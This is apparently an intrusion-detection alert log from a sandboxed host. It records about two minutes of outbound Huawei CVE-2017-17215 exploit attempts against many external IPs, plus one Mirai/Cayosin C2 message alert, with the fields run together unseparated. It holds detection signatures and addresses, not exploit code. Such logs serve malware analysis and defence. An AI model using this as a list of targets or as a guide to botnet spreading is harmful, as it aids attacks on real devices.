                                            06/14/24-10:43:52.150785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5573837215192.168.2.1441.196.152.105
                                            06/14/24-10:44:33.133878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4113837215192.168.2.14156.28.165.152
                                            06/14/24-10:43:34.662840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5819037215192.168.2.14197.160.6.126
                                            06/14/24-10:44:00.338988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4038037215192.168.2.1441.182.249.72
                                            06/14/24-10:43:41.849764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3296437215192.168.2.14156.162.167.145
                                            06/14/24-10:43:43.971178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5523037215192.168.2.14197.14.181.130
                                            06/14/24-10:44:04.407590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5849037215192.168.2.14197.20.125.79
                                            06/14/24-10:44:35.181218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4154637215192.168.2.14156.51.44.45
                                            06/14/24-10:44:02.364892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4468037215192.168.2.14156.76.190.118
                                            06/14/24-10:44:00.323125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5979037215192.168.2.14156.163.26.80
                                            06/14/24-10:44:22.880239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4560037215192.168.2.14197.221.57.33
                                            06/14/24-10:44:24.934424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4706437215192.168.2.14156.254.147.159
                                            06/14/24-10:44:16.714835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5899037215192.168.2.14156.28.133.212
                                            06/14/24-10:44:08.504762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3572037215192.168.2.14156.84.215.52
                                            06/14/24-10:43:41.848076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4486437215192.168.2.14156.255.221.226
                                            06/14/24-10:44:02.385656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586837215192.168.2.14197.124.71.159
                                            06/14/24-10:43:56.227634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3318237215192.168.2.14156.57.128.63
                                            06/14/24-10:44:20.830978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4134437215192.168.2.14156.48.219.141
                                            06/14/24-10:44:12.642755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4050637215192.168.2.14156.105.227.79
                                            06/14/24-10:44:26.977327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5374837215192.168.2.14156.96.25.65
                                            06/14/24-10:43:36.717636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4449437215192.168.2.14197.199.250.147
                                            06/14/24-10:44:31.083350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4615237215192.168.2.14156.134.196.236
                                            06/14/24-10:44:00.344448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5390637215192.168.2.14197.247.43.244
                                            06/14/24-10:43:41.898420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3914637215192.168.2.14197.38.35.149
                                            06/14/24-10:44:04.408435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5927237215192.168.2.14197.213.70.120
                                            06/14/24-10:44:29.012217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5814637215192.168.2.1441.56.214.187
                                            06/14/24-10:44:02.382695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4392437215192.168.2.1441.4.50.102
                                            06/14/24-10:44:10.568454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3428837215192.168.2.14156.219.35.99
                                            06/14/24-10:43:39.789827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4532437215192.168.2.1441.12.90.23
                                            06/14/24-10:44:24.917241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5926637215192.168.2.1441.243.93.191
                                            06/14/24-10:44:06.453169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3434637215192.168.2.1441.214.167.27
                                            06/14/24-10:43:56.245829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5795437215192.168.2.1441.175.201.120
                                            06/14/24-10:43:48.028497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3498437215192.168.2.1441.157.31.166
                                            06/14/24-10:44:18.766104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084037215192.168.2.1441.233.122.95
                                            06/14/24-10:44:31.055559TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6071637215192.168.2.14156.125.236.110
                                            06/14/24-10:43:50.071604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4911837215192.168.2.14197.121.251.223
                                            06/14/24-10:44:04.411938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3331037215192.168.2.14197.31.49.210
                                            06/14/24-10:44:29.022169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4416637215192.168.2.1441.218.213.204
                                            06/14/24-10:44:18.776249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3614237215192.168.2.14156.10.176.70
                                            06/14/24-10:44:29.014292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3300637215192.168.2.1441.172.105.180
                                            06/14/24-10:43:39.792028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5528037215192.168.2.14197.107.144.207
                                            06/14/24-10:43:52.162375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3724637215192.168.2.1441.12.70.202
                                            06/14/24-10:44:12.641793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5655237215192.168.2.14197.233.26.232
                                            06/14/24-10:43:50.073852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5494837215192.168.2.1441.200.203.97
                                            06/14/24-10:43:54.200154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5355837215192.168.2.14156.236.18.48
                                            06/14/24-10:43:37.762146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5206837215192.168.2.1441.60.250.212
                                            06/14/24-10:43:58.275227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4327437215192.168.2.1441.87.171.178
                                            06/14/24-10:43:50.073783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4697837215192.168.2.1441.206.225.114
                                            06/14/24-10:44:22.881917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5317037215192.168.2.14197.135.243.80
                                            06/14/24-10:44:02.367423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5120637215192.168.2.1441.112.80.69
                                            06/14/24-10:44:06.471388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3490837215192.168.2.1441.231.84.145
                                            06/14/24-10:44:31.082044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5860637215192.168.2.1441.63.175.69
                                            06/14/24-10:44:04.420412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5353837215192.168.2.1441.124.92.48
                                            06/14/24-10:44:08.518857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4910637215192.168.2.14197.161.224.27
                                            06/14/24-10:43:41.848509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5621837215192.168.2.1441.253.161.151
                                            06/14/24-10:44:16.717789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5689637215192.168.2.14197.252.25.212
                                            06/14/24-10:43:50.075075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5273037215192.168.2.1441.149.226.107
                                            06/14/24-10:43:56.225863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3903437215192.168.2.1441.39.176.255
                                            06/14/24-10:43:58.295200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3850237215192.168.2.14156.146.9.2
                                            06/14/24-10:43:39.792578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5772037215192.168.2.1441.236.27.120
                                            06/14/24-10:43:52.163593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3991037215192.168.2.14156.75.238.135
                                            06/14/24-10:43:39.790666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4626237215192.168.2.14156.44.187.201
                                            06/14/24-10:44:24.933359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3698837215192.168.2.14197.54.107.212
                                            06/14/24-10:43:56.227283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4802237215192.168.2.14197.80.151.232
                                            06/14/24-10:43:58.275465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4980037215192.168.2.14197.38.13.75
                                            06/14/24-10:43:36.726373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4627037215192.168.2.14197.157.48.40
                                            06/14/24-10:44:12.641582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4874237215192.168.2.1441.88.109.211
                                            06/14/24-10:44:33.132242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5467037215192.168.2.1441.97.224.60
                                            06/14/24-10:43:50.114919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5754637215192.168.2.14197.20.226.34
                                            06/14/24-10:43:50.074460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6003837215192.168.2.1441.118.211.243
                                            06/14/24-10:43:56.225253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5025437215192.168.2.14156.99.45.252
                                            06/14/24-10:44:35.181482TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3920437215192.168.2.1441.126.174.19
                                            06/14/24-10:43:56.226702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5514237215192.168.2.14156.38.253.118
                                            06/14/24-10:44:20.831205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5387237215192.168.2.14156.108.200.159
                                            06/14/24-10:43:52.159837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084037215192.168.2.14156.175.162.239
                                            06/14/24-10:43:48.027700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6036237215192.168.2.1441.24.54.173
                                            06/14/24-10:44:24.944234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3940837215192.168.2.1441.64.6.30
                                            06/14/24-10:44:20.805910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4289437215192.168.2.14197.172.203.239
                                            06/14/24-10:44:31.079211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5427037215192.168.2.1441.224.141.39
                                            06/14/24-10:43:52.146550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435837215192.168.2.14156.223.216.255
                                            06/14/24-10:44:12.614170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5774037215192.168.2.1441.107.247.79
                                            06/14/24-10:44:20.805301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4362237215192.168.2.1441.62.13.113
                                            06/14/24-10:43:43.943381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5696837215192.168.2.14197.210.251.227
                                            06/14/24-10:44:27.001983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5011237215192.168.2.1441.179.130.138
                                            06/14/24-10:44:33.132586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768437215192.168.2.14197.192.243.80
                                            06/14/24-10:44:14.685398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5768437215192.168.2.14197.61.215.63
                                            06/14/24-10:43:48.022047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4038837215192.168.2.1441.78.211.125
                                            06/14/24-10:43:52.149079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5059837215192.168.2.14197.37.57.230
                                            06/14/24-10:44:14.667980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3693237215192.168.2.1441.210.111.231
                                            06/14/24-10:44:02.365590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4478237215192.168.2.1441.97.202.97
                                            06/14/24-10:44:33.132733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4013437215192.168.2.14156.165.179.219
                                            06/14/24-10:43:37.762253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5897637215192.168.2.14197.223.90.188
                                            06/14/24-10:43:43.943464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5774037215192.168.2.14197.176.174.149
                                            06/14/24-10:43:50.072963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4437437215192.168.2.14156.179.29.225
                                            06/14/24-10:43:54.201315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3951037215192.168.2.14156.33.227.47
                                            06/14/24-10:43:39.792246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4108037215192.168.2.14156.35.143.17
                                            06/14/24-10:43:41.850457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4598837215192.168.2.14197.178.164.7
                                            06/14/24-10:44:16.718076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5381237215192.168.2.14156.254.153.97
                                            06/14/24-10:44:26.978258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3307037215192.168.2.14197.195.230.75
                                            06/14/24-10:44:29.012277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3981837215192.168.2.14197.119.224.166
                                            06/14/24-10:44:35.182278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3984037215192.168.2.14156.170.16.84
                                            06/14/24-10:43:34.661732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5521037215192.168.2.1441.21.0.89
                                            06/14/24-10:44:26.979429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4364837215192.168.2.14197.118.237.236
                                            06/14/24-10:44:29.022650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4790637215192.168.2.14197.75.171.229
                                            06/14/24-10:44:22.858483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5501837215192.168.2.1441.114.232.42
                                            06/14/24-10:43:50.074652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4284237215192.168.2.1441.11.26.88
                                            06/14/24-10:43:52.147085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574237215192.168.2.14197.200.181.92
                                            06/14/24-10:44:33.133764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5013437215192.168.2.1441.157.254.247
                                            06/14/24-10:43:37.762330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6086237215192.168.2.14197.27.216.116
                                            06/14/24-10:44:14.670390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660437215192.168.2.14156.176.31.119
                                            06/14/24-10:44:04.420870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5687437215192.168.2.14197.190.176.144
                                            06/14/24-10:43:34.675847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5840637215192.168.2.1441.96.223.152
                                            06/14/24-10:44:06.470246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5093637215192.168.2.1441.57.241.235
                                            06/14/24-10:44:02.381658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3979837215192.168.2.14156.234.17.58
                                            06/14/24-10:44:26.986083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4332837215192.168.2.1441.146.39.132
                                            06/14/24-10:44:00.322197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5134837215192.168.2.14197.37.196.19
                                            06/14/24-10:44:00.340643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4882437215192.168.2.1441.176.24.106
                                            06/14/24-10:43:36.700634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3348237215192.168.2.1441.13.20.24
                                            06/14/24-10:43:41.849836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5761037215192.168.2.14197.93.197.167
                                            06/14/24-10:43:34.676213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5612037215192.168.2.14197.161.54.138
                                            06/14/24-10:44:31.081921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5167837215192.168.2.14156.94.40.78
                                            06/14/24-10:44:22.859762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4370637215192.168.2.14197.24.21.83
                                            06/14/24-10:43:37.761513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4316237215192.168.2.14156.70.18.128
                                            06/14/24-10:44:35.176532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4111037215192.168.2.1441.229.147.119
                                            06/14/24-10:43:34.678527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4231437215192.168.2.14197.142.240.129
                                            06/14/24-10:44:29.012466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3611237215192.168.2.14197.68.100.175
                                            06/14/24-10:44:29.013739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6091437215192.168.2.14197.5.234.124
                                            06/14/24-10:43:41.848725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5625037215192.168.2.14197.185.51.48
                                            06/14/24-10:43:52.165256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3474637215192.168.2.14197.44.69.61
                                            06/14/24-10:43:43.942793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5607637215192.168.2.14197.115.91.210
                                            06/14/24-10:43:36.726113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5534237215192.168.2.14197.106.147.145
                                            06/14/24-10:44:08.501551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3544037215192.168.2.1441.212.210.147
                                            06/14/24-10:43:54.185691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737637215192.168.2.1441.193.214.111
                                            06/14/24-10:43:50.113738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5020237215192.168.2.14156.14.231.31
                                            06/14/24-10:43:54.184246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4345037215192.168.2.14156.44.97.233
                                            06/14/24-10:44:20.806576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4210837215192.168.2.1441.41.69.223
                                            06/14/24-10:43:34.371586TCP2840516ETPRO TROJAN ELF/BASHLITE/Mirai Cayosin Variant CnC Server Message234961243.231.232.101192.168.2.14
                                            06/14/24-10:44:24.913355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5498437215192.168.2.1441.121.89.209
                                            06/14/24-10:44:29.022377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4651237215192.168.2.14197.43.161.43
                                            06/14/24-10:44:16.732821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4503037215192.168.2.1441.24.103.46
                                            06/14/24-10:43:58.290661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4813437215192.168.2.14197.42.206.232
                                            06/14/24-10:43:45.965642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5504637215192.168.2.14197.81.232.194
                                            06/14/24-10:43:45.984210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4918837215192.168.2.1441.99.214.149
                                            06/14/24-10:43:54.201922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5072237215192.168.2.14197.160.253.2
                                            06/14/24-10:44:16.717837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4862837215192.168.2.1441.5.179.64
                                            06/14/24-10:44:31.052622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3394037215192.168.2.14156.72.121.192
                                            06/14/24-10:44:10.563492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4916437215192.168.2.14156.153.215.32
                                            06/14/24-10:44:02.366853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6034037215192.168.2.1441.186.69.124
                                            06/14/24-10:43:50.114973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5753837215192.168.2.14197.75.69.254
                                            06/14/24-10:44:35.180449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4674437215192.168.2.1441.13.146.7
                                            06/14/24-10:43:36.702404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5529437215192.168.2.1441.54.167.203
                                            06/14/24-10:44:10.568808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4875237215192.168.2.14156.170.195.53
                                            06/14/24-10:43:41.847727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5608237215192.168.2.14156.124.119.79
                                            06/14/24-10:44:06.471862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5911637215192.168.2.14156.206.214.10
                                            06/14/24-10:44:29.011930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5912637215192.168.2.1441.110.205.14
                                            06/14/24-10:44:04.406763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4080837215192.168.2.1441.49.145.50
                                            06/14/24-10:43:48.028004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4094637215192.168.2.14197.133.149.53
                                            06/14/24-10:44:35.180292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3326637215192.168.2.14156.117.182.124
                                            06/14/24-10:44:14.672514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4468837215192.168.2.1441.214.217.167
                                            06/14/24-10:44:04.420809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5561837215192.168.2.14156.152.34.152
                                            06/14/24-10:44:18.761268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5379837215192.168.2.14156.126.116.244
                                            06/14/24-10:43:43.971569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5367237215192.168.2.1441.244.14.14
                                            06/14/24-10:44:08.518024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5642437215192.168.2.14197.26.96.20
                                            06/14/24-10:44:00.321121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5895837215192.168.2.14197.73.37.208
                                            06/14/24-10:44:24.917373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5595437215192.168.2.14197.195.243.52
                                            06/14/24-10:44:18.777929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3376837215192.168.2.14197.113.135.131
                                            06/14/24-10:44:16.715634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3891437215192.168.2.14156.37.39.106
                                            06/14/24-10:44:24.943140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4440037215192.168.2.14156.43.48.211
                                            06/14/24-10:44:26.999358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4776437215192.168.2.14197.74.68.69
                                            06/14/24-10:43:58.291897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4503037215192.168.2.14156.222.255.68
                                            06/14/24-10:43:37.761638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4923637215192.168.2.14156.7.137.241
                                            06/14/24-10:43:52.145775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4012837215192.168.2.14156.52.27.79
                                            06/14/24-10:44:20.827754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3886637215192.168.2.14156.47.243.191
                                            06/14/24-10:44:14.685541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3718837215192.168.2.14197.241.44.26
                                            06/14/24-10:44:08.518125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491637215192.168.2.14156.218.112.84
                                            06/14/24-10:44:31.055298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3855837215192.168.2.14197.156.75.185
                                            06/14/24-10:44:31.055746TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5780637215192.168.2.14156.162.13.112
                                            06/14/24-10:44:00.321356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5888437215192.168.2.14197.68.215.162
                                            06/14/24-10:43:48.030673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4671037215192.168.2.14197.207.240.174
                                            06/14/24-10:44:31.057763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4359037215192.168.2.1441.50.108.147
                                            06/14/24-10:44:29.015232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3729437215192.168.2.14197.217.128.87
                                            06/14/24-10:44:20.807156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4547237215192.168.2.14197.207.221.141
                                            06/14/24-10:44:22.858836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4654837215192.168.2.1441.129.85.187
                                            06/14/24-10:44:04.423545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4089637215192.168.2.14156.82.112.171
                                            06/14/24-10:44:10.543535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4813237215192.168.2.14156.246.58.138
                                            06/14/24-10:43:52.149114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4326237215192.168.2.14156.251.212.201
                                            06/14/24-10:44:02.383203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3775437215192.168.2.1441.246.141.131
                                            06/14/24-10:44:02.383651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5067837215192.168.2.14156.255.158.186
